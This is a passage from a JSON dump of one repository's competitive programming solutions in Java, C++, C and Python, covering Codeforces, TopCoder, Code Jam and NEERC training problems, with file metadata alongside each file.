(int j = i * 2; j < m; j += i) {\n p[j] = false;\n }\n }\n }\n \n for (int i = 2; i < m; i++) {\n if (p[i]) {\n fac[i].add(new Pair(i, 1));\n {\n long n = ((long) i) * i;\n int e = 2;\n while (n < m) {\n fac[(int) n].add(new Pair(i, e));\n e++;\n n *= i;\n }\n }\n \n int e = 1;\n long n = i;\n while (n < m) {\n long k = 2;\n while (n * k < m) {\n if (k % i != 0) {\n fac[(int) (n * k)].add(new Pair(i, e));\n }\n ++k;\n }\n ++e;\n n *= i;\n }\n }\n }\n \n // for (int i = 2; i < 20; i++) {\n // System.out.print(i + \" : \");\n // for (Pair pair : fac[i]) {\n // System.out.print(pair + \" \");\n // }\n // System.out.println();\n // }\n \n int[] a = new int[m];\n int t = in.nextInt();\n while (--t >= 0) {\n int n = in.nextInt();\n \n long mod = in.nextInt();\n \n for (int i = 0; i <= n; i++) {\n a[i] = 0;\n }\n \n for (int i = 0; i < n; i++) {\n g[i].clear();\n }\n \n for (int i = 1; i < n; i++) {\n int j = in.nextInt() - 1;\n g[j].add(i);\n }\n \n dfs(0);\n \n for (int i = 2; i < n; i++) {\n for (Pair pair : fac[i]) {\n a[pair.p] += pair.n;\n }\n }\n \n for (int i = 1; i < n; i++) {\n for (Pair pair : fac[size[i] + 1]) {\n a[pair.p] -= pair.n;\n }\n }\n \n long ans = 1;\n \n for (int i = 2; i <= n; i++) {\n long q = 1;\n for (int j = a[i]; j > 0; j--) {\n q = (q * i) % mod;\n }\n ans = (ans * q) % mod;\n }\n \n out.println(ans);\n }\n \n }\n \n public void run() {\n try {\n if (taskName == null) {\n in = new FastScanner(null);\n out = new PrintWriter(System.out);\n \n } else {\n in = new FastScanner(new File(taskName + \".in\"));\n out = new PrintWriter(new File(taskName + \".out\"));\n \n }\n \n solve();\n \n out.close();\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n \n class FastScanner {\n BufferedReader br;\n StringTokenizer st;\n \n FastScanner(File f) {\n try {\n if (f == null) {\n br = new BufferedReader(new InputStreamReader(System.in));\n } else {\n br = new BufferedReader(new FileReader(f));\n }\n } catch (FileNotFoundException e) {\n 
e.printStackTrace();\n }\n }\n \n long nextLong() {\n return Long.parseLong(next());\n }\n \n String next() {\n while (st == null || !st.hasMoreTokens()) {\n try {\n st = new StringTokenizer(br.readLine());\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n return st.nextToken();\n }\n \n int nextInt() {\n return Integer.parseInt(next());\n }\n }\n \n public static void main(String[] arg) {\n new I().run();\n }\n}\n" }, { "alpha_fraction": 0.37931033968925476, "alphanum_fraction": 0.3987068831920624, "avg_line_length": 12.285714149475098, "blob_id": "e665cee17243351bfe2bce1046faf9114ef9edab", "content_id": "151dab1d0409f924dbc8c3d519b4e6334e8b853e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 464, "license_type": "no_license", "max_line_length": 38, "num_lines": 35, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.11/H.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdio>\n#include <vector>\n#include <iostream>\n \nusing namespace std;\n \nvoid run()\n{\n int x;\n cin >> x;\n if(!x){\n cout << 1;\n return;\n }\n if (x == 1){\n cout << 0;\n return;\n }\n if (x % 2){\n cout << 4;\n x--;\n }\n while (x >= 2){\n cout << 8;\n x -= 2;\n }\n}\n \nint main()\n{\n freopen(\"holes.in\", \"r\", stdin);\n freopen(\"holes.out\", \"w\", stdout);\n run();\n return 0;\n}" }, { "alpha_fraction": 0.3686770498752594, "alphanum_fraction": 0.4027237296104431, "avg_line_length": 24.700000762939453, "blob_id": "38e255ce9d866cebfdc83c022ce0cb520debec39", "content_id": "99327c6c7c1b2cd1c5e33043e8a0042226d7493d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1028, "license_type": "no_license", "max_line_length": 92, "num_lines": 40, "path": "/2022/quora/blocks.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "def get(n):\n n = int(n)\n ret = ['0'] * 8\n for i in range(8):\n if (1 << i) & n:\n ret[7 - i] = '1'\n 
return ''.join(ret)\n\nn = int(input())\nmasks = []\nfor i in range(n):\n s, m = input().split('/')\n m = int(m)\n c = ''.join(map(get, s.split('.')))\n c = c[:m] + '*' * (32 - m)\n masks.append(c)\n\nmasks.sort()\nans = [masks[0]]\nfor mask in masks:\n ans.append(mask)\n while len(ans) >= 2:\n first = -1\n for j in range(32):\n if ans[-2][j] != ans[-1][j]:\n first = j\n break\n if first == -1 or ans[-2][first] == '*':\n ans.pop()\n break\n if first == 31 or (ans[-2][first + 1] == '*' and ans[-1][first + 1] == '*'):\n ans[-2] = ans[-2][:first] + '*' * (32 - first)\n ans.pop()\n continue\n break\n\nfor mask in ans:\n m = 32 - mask.count('*')\n mask = mask.replace('*', '0')\n print('.'.join(str(int(mask[i * 8 : (i + 1) * 8], 2)) for i in range(4)) + '/' + str(m))\n" }, { "alpha_fraction": 0.29629629850387573, "alphanum_fraction": 0.3497942388057709, "avg_line_length": 21.090909957885742, "blob_id": "a46947326f44b76cd4fc2b361acefa65b51ba123", "content_id": "b07746e5c6566106e3afca658877a3599fce39bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 486, "license_type": "no_license", "max_line_length": 63, "num_lines": 22, "path": "/CodeForce/0411/allLanguages/c.c", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include<stdio.h>\n#include<string.h>\n\nint main()\n{\n int i, ok = 0, ok1 = 0, ok2 = 0, ok3 = 0;\n char s[101];\n scanf(\"%s\", s);\n for (i = 0; i < strlen(s); i++)\n {\n if (s[i] >= 'a' && s[i] <= 'z')\n ok = 1;\n if (s[i] >= 'A' && s[i] <= 'Z')\n ok1 = 1;\n if (s[i] >= '0' && s[i] <= '9')\n ok2 = 1;\n }\n if (strlen(s) >= 5)\n ok3 = 1;;\n printf(ok + ok1 + ok2 + ok3 == 4 ? 
\"Correct\" : \"Too weak\");\n return 0;\n}\n" }, { "alpha_fraction": 0.4932655692100525, "alphanum_fraction": 0.5120711326599121, "avg_line_length": 30.23015785217285, "blob_id": "203c7fbc6643f4748b7f806e22670ac1671c5874", "content_id": "f333f01d638f560bacfa91bdb19ec6bf2dbc4714", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3935, "license_type": "no_license", "max_line_length": 174, "num_lines": 126, "path": "/2021/gcj1A/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n ints(n, q);\n auto stringify = [&](ll i) {\n string s;\n forj(q)\n s += ((1ll << j) & i) != 0 ? 
'T' : 'F';\n return s;\n };\n auto maskify = [&](const string& s) {\n ll mask = 0;\n forj(q)\n if (s[j] == 'T')\n mask ^= 1ll << j;\n return mask;\n };\n\n auto invert = [&](const int& mask) {\n return mask ^ ((1ll << q) - 1);\n };\n\n auto getResult = [&](const int& answers, const int& mask) {\n return __builtin_popcount(invert(answers ^ mask));\n };\n\n vector<pair<ll, int>> s;\n fori(n)\n {\n string ss;\n int x;\n readln(ss, x);\n s.pb({maskify(ss), x});\n }\n for (auto& [answers, correct] : s)\n if (correct < q - correct)\n {\n correct = q - correct;\n answers = invert(answers);\n }\n if (n == 1)\n {\n cout << stringify(s[0].first) << \" \" << s[0].second << \"/1\" << endl;\n }\n else\n {\n vector<int> masks;\n fori(1 << q)\n {\n int ok = 0;\n for (const auto& [answers, correct]: s)\n ok += correct == getResult(answers, i);\n if (ok == 2)\n masks.pb(i);\n }\n\n int ms = 0;\n int answer = 0;\n fori(1 << q)\n {\n int cur = 0;\n for (int mask: masks)\n cur += getResult(i, mask);\n if (cur > ms)\n ms = cur,\n answer = i;\n }\n int g = gcd(ms, SZ(masks));\n cout << stringify(answer) << \" \" << ms / g << \"/\" << SZ(masks) / g << endl;\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t); fori(t) cout << \"Case #\" << (i + 1) << \": \", run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return 
is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.47116968035697937, "alphanum_fraction": 0.48929160833358765, "avg_line_length": 15.405405044555664, "blob_id": "333684239a547b875f6c9f623479e44f2cb4c6b3", "content_id": "cc7c936a4f9587882b0f8f44f67f29d08dfe7de1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 607, "license_type": "no_license", "max_line_length": 51, "num_lines": 37, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.08/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stack>\n#include <vector>\n#include <stdio.h>\n#include <queue>\n#include <set>\n#define INF 1000000007\n\nusing namespace std;\n\nstruct point\n{\n int x, y;\n point(){}\n};\n\nvoid run()\n{\n point s, t, q;\n scanf(\"%d %d %d %d\\n\", &s.x, &s.y, &t.x, &t.y);\n if (s.x > t.x)\n swap(s, t); else\n if (s.x == t.x)\n if (s.y > t.y)\n swap(s, t);\n // printf(\"%d %d %d %d\\n\", s.x, s.y, t.x, t.y);\n\n}\n\nint main()\n{\n // freopen(\"matching.in\", \"r\", stdin);\n// freopen(\"matching.out\", \"w+\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.4817466139793396, "alphanum_fraction": 0.4906943440437317, "avg_line_length": 46.35593032836914, "blob_id": "2de82a96ed5375c513782449a6901325691221da", "content_id": "86fdae7358de1a90ce28898855869489572e074a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2794, "license_type": "no_license", "max_line_length": 928, "num_lines": 59, "path": "/TopCoder/TC607/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include 
<queue>\n#define enter printf(\"\\n\");\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define rnv(a) read(n); vi a; readln(a, n);\n\n#define CLASSNAME PalindromicSubstringsDiv2\n#define METHODNAME count\n#define PARAMETRES vector <string> a, vector <string> b\n#define TYPE int\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"input\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? 
'\\n' : ' ');}\n\nclass CLASSNAME\n{\n public :\n int smallestArea(vector <int> x, vector <int> y)\n {\n string s = \"\";\n forn(i, a.size())\n s += a[i];\n forn(i, b.size())\n s += b[i];\n int ans = 0;\n int n = s.size();\n forn(i, n)\n for (int j = 0; i + j < n && i - j >= 0; j++)\n if (s[i + j] == s[i - j])\n ans++;\n else\n break;\n forn(i, n)\n for (int j = 0; i + j < n && i - j - 1 >= 0; j++)\n if (s[i + j] == s[i - j - 1])\n ans++;\n else\n break;\n return ans;\n }\n};\n" }, { "alpha_fraction": 0.42124277353286743, "alphanum_fraction": 0.43605491518974304, "avg_line_length": 29.086956024169922, "blob_id": "6c8822fa5ded77c3579bae6a1cdb956374ebdd59", "content_id": "bcb05b329b3a26051fb035297c6bf768a3596300", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2768, "license_type": "no_license", "max_line_length": 928, "num_lines": 92, "path": "/2013/2013RCC3/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n#define vi vector<int>\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> a, b, c, d;\nint n, m;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int 
&a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint counter = 0;\nbool tr(vector<int> a, vi b, vi c, vi d, int t, int s)\n{\n /*writeln(d);\n writeln(a);\n writeln(b);\n writeln(c);\n enter;*/\n if (s > n)\n return false;\n bool f = false;\n for (int i = t; i <= 3 * n; i++)\n {\n if (d[i])\n continue;\n b[s] = i;\n c[s] = a[s] + b[s];\n if (c[s] <= 3 * n && d[c[s]])\n continue;\n if (c[s] > 3 * n)\n return false;\n d[b[s]]++;\n d[c[s]]++;\n if (s == n && a[s] + b[s] == c[s] && c[s] <= 3 * n && d[c[s]] == 1)\n {\n writeln(a);\n writeln(b);\n writeln(c);\n return true;\n }\n f |= tr(a, b, c, d, t, s + 1);\n if (f)\n return true;\n d[b[s]] = max(0, d[b[s]] - 1);\n d[c[s]] = max(0, d[c[s]] - 1);\n }\n return f;\n}\n\nint main()\n{\n freopen(\"input.txt\", \"r\", stdin);\n// freopen(\"output.txt\", \"w+\", stdout);\n readln(n);\n n = 20;\n for (n = 1; n <= 23; n++)\n {\n writeln(n);\n if (n % 4 >= 2)\n continue;\n d.resize(3 * n + 1, 0);\n a.resize(n + 1);\n for (int i = 1; i <= n; i++)\n a[i] = i,\n d[i] = 1;\n b.resize(n + 1);\n c.resize(n + 1);\n tr(a, b, c, d, n, 1);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.3249778747558594, "alphanum_fraction": 0.34856975078582764, "avg_line_length": 24.885496139526367, "blob_id": "3dba6779cdf6ae4efd40c968c4c66b1c7e717de8", "content_id": "179bd97438d491f5987ce3723d6fede7bff758ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3391, "license_type": "no_license", "max_line_length": 88, "num_lines": 131, "path": 
"/2014/gcj2014_0/C.hpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#ifndef SOLUTION_HPP\n#define SOLUTION_HPP\n\n#include <bits/stdc++.h>\n#include <QObject>\n#include <QRunnable>\n#include <QThread>\n#include <QTextStream>\n#include <QDebug>\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\n\nstruct Solution\n{\n int n, m, count;\n vector<vector<int>> a;\n int ans = 0;\n int dfscount = 0;\n\n void input(QTextStream &in)\n {\n in >> n >> m >> count;\n a.resize(n + 2);\n fori(n + 1)\n a[i].resize(m + 2);\n }\n\n void dfs(int i, int j, vector<vector<int>> aa, int cur = 1)\n {\n if (i == 0 || j == 0 || i == n + 1 || j == m + 1)\n return;\n aa[i][j] = 1;\n if (cur == count)\n throw aa;\n dfscount++;\n int temp = 0;\n for (int dx = -1; dx <= 1; dx++)\n for (int dy = -1; dy <= 1; dy++)\n if (!(i + dx == 0 || j + dy == 0 || i + dx == n + 1 || j + dy == m + 1))\n if (aa[i + dx][j + dy] == 0)\n aa[i + dx][j + dy] = 1,\n temp++;\n if (cur + temp > count || temp == 0)\n return;\n else\n for (int dx = -1; dx <= 1; dx++)\n for (int dy = -1; dy <= 1; dy++)\n if (dx * dx + dy * dy)\n dfs(i + dx, j + dy, aa, cur + temp);\n }\n\n void solve()\n {\n if (n == 1)\n {\n ans = 1;\n a[1][1] = 2;\n forn1(j, m - count)\n a[1][j + 1] = 1;\n return;\n }\n if (m == 1)\n {\n ans = 1;\n a[1][1] = 2;\n forn1(j, n - count)\n a[j + 1][1] = 1;\n return;\n }\n if (n == 2 || m == 2)\n if (count % 2 && count != n * m - 1)\n {\n ans = 
0;\n return;\n }\n if (count == 0)\n {\n ans = 1;\n fori(n + 1)\n forj(m + 1)\n a[i][j] = 1;\n a[1][1] = 2;\n return;\n }\n count = n * m - count;\n forn1(i, n + 1)\n forn1(j, m + 1)\n try\n {\n dfs(i, j, a);\n }\n catch(vector<vector<int>> e)\n {\n ans = 1;\n e[i][j] = 2;\n fori(n+1)\n forj(m+1)\n a[i][j] = e[i][j];\n return;\n }\n ans = 0;\n }\n\n void output(QTextStream &out)\n {\n if (ans == 0)\n out << \"Impossible\\n\";\n else\n forn1(i, n + 1)\n {\n forn1(j, m + 1)\n out << (a[i][j] == 0 ? '*' : a[i][j] == 1 ? '.' : 'c');\n out << \"\\n\";\n }\n }\n};\n\n#endif // SOLUTION_HPP\n" }, { "alpha_fraction": 0.3142857253551483, "alphanum_fraction": 0.3928571343421936, "avg_line_length": 22.33333396911621, "blob_id": "de59bf5e590d0104421ba5b88ee808de08a7281d", "content_id": "f316cb5484a0c14c07078979d766ce5dbfb5e29f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 140, "license_type": "no_license", "max_line_length": 49, "num_lines": 6, "path": "/2015/tpp/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "s = input()\nt = \"1\" * 4\nif len(s) == 80 and (s[:4] == t) ^ (s[-4:] == t):\n print(s if s[:4] == t else s[::-1])\nelse:\n print(\"0\" * 80)\n" }, { "alpha_fraction": 0.4919678568840027, "alphanum_fraction": 0.5097891688346863, "avg_line_length": 29.18181800842285, "blob_id": "f782bfae28b4a19a8fb105ddcfc9ef027ae3936d", "content_id": "2d40f3a78dfe5166cb466e38739f18084f3ec415", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3984, "license_type": "no_license", "max_line_length": 174, "num_lines": 132, "path": "/CodeForce/1732/C2.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//binSearch\n//x \\in [l, r]-> min, f(x) == true\ntemplate<typename T, typename F>\nT binSearch(T l, T r, F f, T eps = 1)\n{\n T m;\n while (abs(r - l) > eps)\n m = l + (r - l) / 2,\n (f(m) ? r : l) = m;\n return f(l) ? 
l : r;\n}\n\n//}}}\n\npair<ll, ll> add(const pair<ll, ll>& a, const pair<ll, ll>& b)\n{\n return {a.first + b.first, a.second ^ b.second};\n}\n\nvoid run()\n{\n ints(n, q);\n vi a(n);\n readln(a);\n vector<ll> p = {0};\n vector<ll> x = {0};\n set<int> s, b;\n fori(n)\n {\n p.pb(p.back() + a[i]);\n x.pb(x.back() ^ a[i]);\n if (a[i])\n s.insert(i + 1),\n b.insert(-i - 1);\n }\n\n auto get = [&](int l, int r) {\n --l;\n return p[r] - p[l] - (x[r] ^ x[l]);\n };\n forn(Q, q)\n {\n ints(l, r);\n ll sum = get(l, r);\n if (sum == 0)\n {\n writeln(l, l);\n continue;\n }\n int index = l;\n int length = r - l;\n auto first = s.lower_bound(l);\n int cnt = 0;\n while (first != s.end() && *first <= r && cnt <= 31)\n {\n int ll = *first;\n auto second = b.lower_bound(-r);\n for (int i = cnt; i <= 31; ++i)\n {\n if (second == b.end() || -*second < ll)\n break;\n int rr = -*second;\n if (get(ll, rr) == sum)\n if (rr - ll < length)\n length = rr - ll,\n index = ll;\n ++second;\n }\n ++cnt;\n ++first;\n\n }\n writeln(index, index + length);\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false); cin.tie(0);\n ints(t); fori(t) run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void 
priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5053732395172119, "alphanum_fraction": 0.520952045917511, "avg_line_length": 31.394859313964844, "blob_id": "5b3fb2afe740331a2ae7b97443b55d8ec033741b", "content_id": "71d9896bc6a1b5225807264e2d3ebdab30a88617", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 13865, "license_type": "no_license", "max_line_length": 162, "num_lines": 428, "path": "/CodeForce/1182/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 07 August 2018 (&&, whole) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n\nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\nttta void readln(Args&... 
args){(read(args),...);}tthti void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\nvector<string>split(string&s,string d){vector<string>v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n\n//matrix\ntemplate<typename T>\nstruct matrix\n{\n friend void swap(matrix& lhs, matrix& rhs)\n {\n swap(lhs.n, rhs.n);\n swap(lhs.m, rhs.m);\n swap(lhs.a, rhs.a);\n }\n\n matrix(int n, int m) : n(n), m(m)\n {\n a.resize(n, valarray(T(), m));\n fori(::min(n, m)) a[i][i] = T(1);\n }\n\n matrix(int n, int m, const T& initial) : n(n), m(m)\n {\n a.resize(n, valarray(initial, m));\n }\n\n matrix(const valarray<valarray<T>>& rhs)\n {\n n = size(rhs);\n m = n == 0 ? 0 : size(rhs[0]);\n a.resize(n, valarray(T(), m));\n 